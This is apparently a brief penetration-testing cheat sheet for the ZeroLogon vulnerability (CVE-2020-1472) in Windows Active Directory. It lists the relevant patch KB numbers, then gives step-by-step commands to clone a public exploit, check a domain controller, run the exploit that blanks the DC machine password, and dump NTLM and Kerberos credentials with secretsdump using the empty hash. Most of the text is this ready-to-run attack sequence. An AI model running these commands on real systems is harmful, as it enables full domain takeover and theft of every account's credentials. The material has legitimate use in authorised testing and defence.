AD ZeroLogon
Windows CVE-2020-1472
Patchs (D11/M08/Y20)
- Windows Server 2012 R2 : KB4571723 / Monthly rollup (KB4571703)
- Windows Server 2016 : KB4571694
- Windows Server 2019 : KB4565349
Check
# Clone Git repo
cd $(mktemp -d) && git clone https://github.com/michaelpoznecki/zerologon.git .
# Check without exploitation
python3 zerologon.py NETBIOSNAME IP
# Expected result:
python3 zerologon.py DC01 1.2.3.4
Performing authentication attempts...
============================================================================
Success! DC can be fully compromised by a Zerologon attack.
Exploit
Warning
This exploit change DC password with a blank one !!
# Clone Git repo
cd $(mktemp -d) && git clone https://github.com/michaelpoznecki/zerologon.git .
# Run exploit
python3 zerologon.py DC01 1.2.3.4 -x
# Run SecretDump with blank hash to extract NTLM & Kerberos creds from DC
secretsdump.py -hashes :31d6cfe0d16ae931b73c59d7e0c089c0 'DOMAIN.COM/DC01$@1.2.3.4'